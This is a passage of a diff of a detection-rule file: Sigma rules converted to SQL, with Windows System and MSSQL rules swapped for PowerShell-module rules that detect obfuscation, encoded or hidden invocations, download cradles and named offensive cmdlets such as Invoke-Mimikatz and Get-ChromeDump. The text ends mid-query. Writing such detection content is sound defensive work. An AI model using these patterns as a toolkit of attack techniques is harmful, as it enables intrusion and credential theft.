"attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unlikely" + "Legitimate use remote PowerShell sessions" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", @@ -2867,1137 +2815,1109 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" - ], - "filename": "win_mssql_xp_cmdshell_change.yml" - }, - { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT 